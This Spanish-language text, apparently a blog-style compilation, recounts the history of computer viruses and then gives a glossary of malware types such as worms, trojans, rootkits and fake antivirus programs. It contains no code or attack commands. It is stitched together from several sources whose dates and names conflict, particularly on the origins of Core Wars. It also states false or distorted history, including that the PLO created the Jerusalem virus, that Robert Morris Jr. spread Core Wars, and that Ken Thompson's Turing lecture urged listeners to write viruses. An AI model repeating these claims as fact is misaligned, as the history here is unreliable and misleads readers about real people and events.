En 1949, el matemático estadounidense de origen húngaro John von Neumann, en el Instituto de Estudios Avanzados de Princeton (Nueva Jersey), planteó la posibilidad teórica de que un programa informático se reprodujera. Esta teoría se comprobó experimentalmente en la década de 1950 en los Laboratorios Bell, donde se desarrolló un juego llamado Core Wars en el que los jugadores creaban minúsculos programas informáticos que atacaban y borraban el sistema del oponente e intentaban propagarse a través de él. En 1983, el ingeniero eléctrico estadounidense Fred Cohen, que entonces era estudiante universitario, acuñó el término de "virus" para describir un programa informático que se reproduce a sí mismo. En 1985 aparecieron los primeros caballos de Troya, disfrazados como un programa de mejora de gráficos llamado EGABTR y un juego llamado NUKE-LA. Pronto les siguió un sinnúmero de virus cada vez más complejos. El virus llamado Brain apareció en 1986, y en 1987 se había extendido por todo el mundo. En 1988 aparecieron dos nuevos virus: Stone, el primer virus de sector de arranque inicial, y el gusano de Internet, que cruzó Estados Unidos de un día para otro a través de una red informática. El virus Dark Avenger, el primer infector rápido, apareció en 1989, seguido por el primer virus polimórfico en 1990. En 1995 se creó el primer virus de lenguaje de macros, WinWord Concept.

Los virus tienen la misma edad que las computadoras. Ya en 1949 John Von Neumann, describió programas que se reproducen a sí mismos en su libro "Teoría y Organización de Autómatas Complicados". Es hasta mucho después que se les comienza a llamar como virus. La característica de auto-reproducción y mutación de estos programas, que las hace parecidas a las de los virus biológicos, parece ser el origen del nombre con que hoy los conocemos.

Antes de la explosión de la micro computación se decía muy poco de ellos. Por un lado, la computación era secreto de unos pocos. Por otro lado, las entidades gubernamentales, científicas o militares, que vieron sus equipos atacados por virus, se quedaron muy calladas, para no demostrar la debilidad de sus sistemas de seguridad, que costaron millones, al bolsillo de los contribuyentes. Las empresa privadas como Bancos, o grandes corporaciones, tampoco podían decir nada, para no perder la confianza de sus clientes o accionistas. Lo que se sabe de los virus desde 1949 hasta 1989, es muy poco.

Se reconoce como antecedente de los virus actuales, un juego creado por programadores de la empresa AT&T, que desarrollaron la primera versión del sistema operativo Unix en los años 60. Para entretenerse, y como parte de sus investigaciones, desarrollaron un juego llamado "Core Wars", que tenía la capacidad de reproducirse cada vez que se ejecutaba. Este programa tenía instrucciones destinadas a destruir la memoria del rival o impedir su correcto funcionamiento. Al mismo tiempo, desarrollaron un programa llamado "Reeper", que destruía las copias hechas por Core Wars. Un antivirus o antibiótico, como hoy se los conoce. Conscientes de lo peligroso del juego, decidieron mantenerlo en secreto, y no hablar más del tema. No se sabe si esta decisión fue por iniciativa propia, o por órdenes superiores.

En el año 1983, el Dr. Ken Thomson, uno de los programadores de AT&T, que trabajó en la creación de "Core Wars", rompe el silencio acordado, y da a conocer la existencia del programa, con detalles de su estructura.

La Revista Scientific American a comienzos de 1984, publica la información completa sobre esos programas, con guías para la creación de virus. Es el punto de partida de la vida pública de estos programas, y naturalmente de su difusión sin control, en las computadoras personales.

Por esa misma fecha, 1984, el Dr. Fred Cohen hace una demostración en la Universidad de California, presentando un virus informático residente en una PC. Al Dr. Cohen se le conoce hoy día, como "el padre de los virus". Paralelamente aparece en muchas PCs un virus, con un nombre similar a Core Wars, escrito en Small-C por un tal Kevin Bjorke, que luego lo cede a dominio público. ¡La cosa comienza a ponerse caliente!

El primer virus destructor y dañino plenamente identificado que infecta muchas PC’s aparece en 1986. Fue creado en la ciudad de Lahore, Paquistán, y se le conoce con el nombre de BRAIN. Sus autores vendían copias pirateadas de programas comerciales como Lotus, Supercalc o Wordstar, por suma bajísimas. Los turistas que visitaban Paquistán, compraban esas copias y las llevaban de vuelta a los EE.UU. Las copias pirateadas llevaban un virus. Fue así, como infectaron mas de 20,000 computadoras. Los códigos del virus Brain fueron alterados en los EE.UU., por otros programadores, dando origen a muchas versiones de ese virus, cada una de ellas peor que la precedente. Hasta la fecha nadie estaba tomando en serio el fenómeno, que comenzaba a ser bastante molesto y peligroso.

En 1987, los sistemas de Correo Electrónico de la IBM, fueron invadidos por un virus que enviaba mensajes navideños, y que se multiplicaba rápidamente. Ello ocasionó que los discos duros se llenaran de archivos de origen viral, y el sistema se fue haciendo lento, hasta llegar a paralizarse por mas de tres días. La cosa había llegado demasiado lejos y el Big Blue puso de inmediato a trabajar en los virus su Centro de Investigación Thomas J. Watson, de Yorktown Heights, NI.

Las investigaciones del Centro T. J. Watson sobre virus, son puestas en el dominio público por medio de Reportes de Investigación, editados periódicamente, para beneficio de investigadores y usuarios.

El virus Jerusalem, según se dice creado por la Organización de Liberación Palestina, es detectado en la Universidad Hebrea de Jerusalem a comienzos de 1988. El virus estaba destinado a aparece el 13 de Mayo de 1988, fecha del 40 aniversario de la existencia de Palestina como nación. Una interesante faceta del terrorismo, que ahora se vuelca hacia la destrucción de los sistemas de cómputo, por medio de programas que destruyen a otros programas.

El 2 de Noviembre del ‘88, dos importantes redes de EE.UU. se ven afectadas seriamente por virus introducidos en ellas. Mas 6,000 equipos de instalaciones militares de la NASA, universidades y centros de investigación públicos y privados se ven atacados.

Por 1989 la cantidad de virus detectados en diferentes lugares sobrepasan los 100, y la epidemia comienza a crear situaciones graves. Entre las medidas que se toma, para tratar de detener el avance de los virus, es llevar a los tribunales a Robert Morís Jr. acusado de ser el creador de un virus que infectó a computadoras del gobierno y empresas privadas. Al parecer, este muchacho conoció el programa Core Wars, creado en la AT&T, y lo difundió entre sus amigos. Ellos se encargaron de diseminarlo por diferentes medios a redes y equipos. Al juicio se le dio gran publicidad, pero no detuvo a los creadores de virus.

La cantidad de virus que circula en la actualidad no puede llegar a ser precisada pero para tener una idea los últimos antivirus pueden identificar alrededor de cincuenta mil virus (claro que en este valor están incluidos los clones de un mismo virus).

Es importante señalar que la palabra "Virus" es un vocablo latín y su equivalencia a nuestro lenguaje actual es "veneno"
La Teoría y Organización de un Autómata Complicado (1949) de John Von Neumann, uno de los primeros miembros de la comunidad informática y padre del modelo actual de computadoras, presentó con esta teoría el modelo de programa de un virus, explicando que los programas de los computadores se podían multiplicar, nadie pensó en ese momento la repercusión que tendría esta teoría en un futuro no muy lejano.

Diez años más tarde, en la atmósfera enrarecida de los laboratorios AT&T Bell, tres jóvenes programadores desarrollaron un juego denominado "Core-Wars". Estos jóvenes genios, Douglas McIlroy, Victor Vysottsky y Robert Morris, comprendieron magníficamente el funcionamiento interno de los computadores.

"Core-Wars", consistía en una batalla mano a mano entre los códigos de dos programadores, cada programador desarrollaba un conjunto de programas que se reproducían, llamados Organismos. Tras el tiro de salida, cada jugador soltaba sus Organismos en la memoria del computador. Los Organismos de cada uno trataban de destruir a los del oponente y el jugador que mantuviera mayor número de supervivientes al finalizar el juego era declarado ganador. Los jóvenes genios como buenos empleados, al finalizar borraban los juegos y se iban a casa.
El concepto de juego se difundió por otros centros de alta tecnología, como el Instituto de Tecnología de Massachusetts (MIT) o el Centro de Investigación de Xerox en Palo Alto, California.

Cuando se jugaba al Core-Wars en una sola máquina, podía pararse y no se corría el riesgo de que se propagara. Esto se realizó no mucho antes de que el fenómeno que hoy conocemos como "conectividad" facilitara las comunicaciones entre computadoras. El fantasma de un juego divertido que se volviera perjudicial y se multiplicara entre las máquinas interconectadas rondó por sus cabezas.

El juego Core-Wars fue un secreto guardado por sus jugadores hasta 1983. Ken Thompson, el brillante programador que escribió la versión original en UNIX, lo develo a la opinión pública. Cuando Thompson recibió uno de los más altos honores de la industria, el premio A.M. Turing, su discurso de aceptación contenía una receta para desarrollar virus. Thompson contó todo sobre Core-Wars y animó a su audiencia a intentar practicar el concepto.

El número de Mayo de 1984 de la revista Scientific American (Científico Americano), incluyó un artículo describiendo Core-Wars y ofreció a los lectores la oportunidad de solicitar un conjunto de instrucciones para diversión y juegos en el hogar o la oficina.

En ese mismo año 1984, Fred Cohen expuso por primera vez por escrito, el concepto de virus informático, durante el desarrollo de una conferencia sobre seguridad.

El primer contagio masivo de microordenadores se dio en 1987 a través del MacMag Virus también llamado Peace Virus sobre ordenadores Macintosh. La historia, se describe a continuación:

Dos programadores, uno de Montreal, Richard Brandow, y el otro de Tucson, Drew Davison, crearon un virus y lo incluyeron en un disco de juegos que repartieron en una reunión de un club de usuarios. Uno de los asistentes, Marc Canter, consultor de Aldus Corporation, se llevó el disco a Chicago y contaminó su ordenador. Al realizar pruebas del paquete Aldus Freehand, contaminó el disco maestro el cual posteriormente devolvió a la empresa fabricante; allí la epidemia se extendió y el programa se comercializó con el virus incluido. El virus era bastante benigno, el 2 de Marzo de 1988 (primer aniversario de la aparición del Macintosh II) hizo público en la pantalla un mensaje pidiendo la paz entre los pueblos, y se destruyó a sí mismo. Existe una versión de este virus detectada en alguna red de correo electrónico de IBM y al que se denomina IBM Christmas Card o Xmas, el cual felicita al usuario cada 25 de Diciembre.

Pero no todo fue felicitaciones y buenos deseos. El conocido virus Viernes 13 fue detectado por primera vez en la Universidad Hebrea de Jerusalén "casualmente" el primer Viernes 13 (13 de Mayo de 1988), era el cuarenta aniversario de la fundación del Estado Judío. El virus se difundió por la red de la Universidad e infectó ordenadores del ejército israelí, Ministerio de Educación, etc.

Aquí hay un caso más reciente. En 1987 un periodista de los Estados Unidos perdió la información de 6 meses de trabajo guardada en un disco, cuando trató de recuperarla se dio cuenta que era obra de un sabotaje. En el disco se encontraba el número telefónico de una tienda de computación pakistaní y el siguiente mensaje:
Bienvenidos al calabozo... llámenos para la vacuna.

La información había sido presa de un virus maligno. Investigando el caso se encontró que dicha tienda era Brain Computer Services y que vendía copias ilegales de algunos programas con un costo de cientos de dólares a sólo $1.50 cada una (aproximadamente unos 1000 pesos chilenos). Durante 1986 y 1987, algunos de sus clientes fueron estudiantes estadounidenses atraídos por su bajo costo. Sin embargo, escondido en el disco había un virus; cada vez que el programa se ejecutaba, el virus contaminaba a la computadora y ésta a su vez, infectaba a los discos de otros usuarios. Los diseñadores son los hermanos Amjad y Basit Farooq Alvi, dueños de Brain Computer Services. En 1985, se decidieron a hacer software, y para su desdicha, éste fue copiado y usado sin permiso. Así fue como a Amjad se le ocurrió hacer un programa que se autoduplicara, cuyo objetivo fuera infectar la computadora de un usuario desautorizado, forzándolo así a llamarles para reparar los daños. Al poco tiempo, tenían un virus que incluían en sus copias ilegales. Cuando un pakistaní deseaba una copia de un paquete se le vendía libre de virus, pero a los extranjeros se les vendían copias contaminadas.

Según declaraciones de los hermanos Alvi, en Pakistán, las leyes de derecho de autor no abarcan el software, por lo que vender software pirata no es ilegal. En cambio en EU, como en la mayor parte del mundo, es una práctica ilícita. Ellos aseguran que dejaron de vender copias ilegales en 1987, pensando que los piratas ya debían haber tenido una lección.



Muy difundido también fue el caso de Robert Tappan Morris en Noviembre de 1988, el joven que contaminó (quizá sin ser su
intención) la Red del Pentágono ARPAnet, paralizando gran número de computadoras estatales; los daños causados se calculaban en unos 80 millones de dólares.

Actualmente los virus son una de las principales causas de la pérdida de información en computadores. Sus propietarios deben estar invirtiendo cada vez más en los antivirus para la eliminación y erradicación de éstos, los antivirus no son nada más que programas especialmente diseñados para que batallen contra los virus, los identifiquen y posteriormente los eliminen.

Existe un incesante riesgo que corren hoy en día todos aquellos que se hacen participe de la red de redes (INTERNET), así sea por el mal uso que le dan algunos inescrupulosos al popular correo electrónico mediante el mail-bombing o sino por el solicitar de aquella red archivos, programas, fotos o todo lo que se pueda almacenar en nuestro disco maestro. El primero consiste en recibir falsos correos electrónicos saludando o promocionando ciertos productos desconocidos, del cual el lector se hace participe sin saber que tras esto se oculta una verdadera amenaza de contagio para sus computadores. Y el segundo es adjuntar a los archivos de la INTERNET, programas especialmente diseñados para provocar errores en el huésped, es decir, añadirle un virus para que éste haga de las suyas con el computador que lo recibe.

Todo sobre Malwares y programas maliciosos

¿Que es un Malware?



Malware es la abreviatura de “Malicious software” (software malicioso), término que engloba a todo tipo de programa o código de computadora cuya función es dañar un sistema o causar un mal funcionamiento. Dentro de este grupo podemos encontrar términos como: Virus, Trojan (Caballo de Troya), Gusano (Worm), Dialers, Spyware, Adware, Hijackers, Keyloggers, FakeAVs, Rogues, etc….

En la actualidad y dado que los antiguos llamados Virus ahora comparten funciones con sus otras familias, se denomina directamente a cualquier parasito/infección, directamente como un “Malware”.

Virus



Los Virus Informáticos son sencillamente programas creados para infectar sistemas y a otros programas creándoles modificaciones y daños que hacen que estos funcionen incorrectamente y así interferir en el funcionamiento general del equipo, registrar, dañar o eliminar datos, o bien propagarse por otros equipos y a través de Internet. Serian similares a los virus que afectan a los humanos ya que hay que implementar antibióticos en este caso serian los Antivirus.

Gusanos



Son programas desarrollados para reproducirse por algún medio de comunicación como el correo electrónico (el más común), mensajeros o redes P2P. El objetivo de los mismos es llegar a la mayor cantidad de usuarios posible y lograr distribuir otros tipos de códigos maliciosos que se mencionarán a continuación. Estos últimos serán los encargados de llevar a cabo el engaño, robo o estafa. Otro objetivo muy común de los gusanos es realizar ataques de DDoS contra sitios webs específicos o incluso eliminar "virus que son competencia" para el negocio que se intente realizar.

Troyano



En la teoría, un troyano no es virus, ya que no cumple con todas las características de los mismos, pero debido a que estas amenazas pueden propagarse de igual manera, suele incluírselos dentro del mismo grupo. Un troyano es un pequeño programa generalmente alojado dentro de otra aplicación (un archivo) normal. Su objetivo es pasar inadvertido al usuario e instalarse en el sistema cuando este ejecuta el archivo "huésped". Luego de instalarse, pueden realizar las más diversas tareas, ocultas al usuario. Actualmente se los utiliza para la instalación de otros malware como backdoors y permitir el acceso al sistema al creador de la amenaza. Algunos troyanos, los menos, simulan realizar una función útil al usuario a la vez que también realizan la acción dañina. La similitud con el "caballo de Troya" de los griegos es evidente y debido a esa característica recibieron su nombre.

Backdoors



Estos programas son diseñados para abrir una "puerta trasera" en nuestro sistema de modo tal de permitir al creador de esta aplicación tener acceso al sistema y hacer lo que desee con él. El objetivo es lograr una gran cantidad de computadoras infectadas para disponer de ellos libremente hasta el punto de formas redes como se describen a continuación.

Adware


El adware es un software que despliega publicidad de distintos productos o servicios. Estas aplicaciones incluyen código adicional que muestra la publicidad en ventanas emergentes, o a través de una barra que aparece en la pantalla simulando ofrecer distintos servicios útiles para el usuario. Generalmente, agregan ícono gráficos en las barras de herramientas de los navegadores de Internet o en los clientes de correo, la cuales tienen palabras claves predefinidas para que el usuario llegue a sitios con publicidad, sea lo que sea que esté buscando.

Spyware


El spyware o software espía es una aplicación que recopila información sobre una persona u organización sin su conocimiento ni consentimiento. El objetivo más común es distribuirlo a empresas publicitarias u otras organizaciones interesadas. Normalmente, este software envía información a sus servidores, en función a los hábitos de navegación del usuario. También, recogen datos acerca de las webs que se navegan y la información que se solicita en esos sitios, así como direcciones IP y URLs que se visitan. Esta información es explotada para propósitos de mercadotecnia, y muchas veces es el origen de otra plaga como el SPAM, ya que pueden encarar publicidad personalizada hacia el usuario afectado. Con esta información, además es posible crear perfiles estadísticos de los hábitos de los internautas. Ambos tipos de software generalmente suelen "disfrazarse" de aplicaciones útiles y que cumplen una función al usuario, además de auto ofrecer su descarga en muchos sitios reconocidos.

Dialer


Tratan de establecer conexión telefónica con un número de tarificación especial.

Hijacker



Se encargan de “Secuestrar” las funciones de nuestro sistema cambiando la pagina de inicio y búsqueda y/o otros ajustes del navegador. Estos pueden ser instalados en el sistema sin nuestro consentimiento al visitar ciertos sitos web mediante controles ActiveX o bien ser incluidos por un troyano.

Joke


Gasta una broma informática al usuario.

Rootkit



Es un conjunto de herramientas usadas frecuentemente por los intrusos informáticos o crackers que consiguen acceder ilícitamente a un sistema informático. Estas herramientas sirven para esconder los procesos y archivos que permiten al intruso mantener el acceso al sistema, a menudo con fines maliciosos. Hay rootkits para una amplia variedad de sistemas operativos, como Linux, Solaris o Microsoft Windows. Por ejemplo, el rootkit puede esconder una aplicación que lance una consola cada vez que el atacante se conecte al sistema a través de un determinado puerto. Los rootkits del kernel o núcleo pueden contener funcionalidades similares.

Herramienta de Hacking


Permite a los hackers realizar acciones peligrosas para las víctimas de los ataques.

Keylogger



Aplicaciones encargadas de almacenar en un archivo todo lo que el usuario ingrese por el teclado (Capturadores de Teclado). Son ingresados por muchos troyanos para robar contraseñas e información de los equipos en los que están instalados.

Hoax



Son mensajes de correo electrónico con advertencias sobre falsos virus.

Spam



Es el envío indiscriminado de mensajes de correo no solicitados, generalmente publicitarios.

FakeAVs & Rogues


Básicamente un Rogue software es un falso programa que nos mostrara falsos resultados de nuestro sistema ofreciéndonos a la vez pagar por este para que se encargue de repararlo. Por supuesto que esto es todo totalmente falso y el único objetivo es el de engañar al usuario a comprar su falso producto.

Entre los mas destacados están los FakesAVs (Falsos Antivirus) y FakeAS (Falsos Antispywares)

CONSEJO

Cuando te conectas a internet tenes que tener una "conexion segura"



Jajaja,,,un poquito de humor para terminar.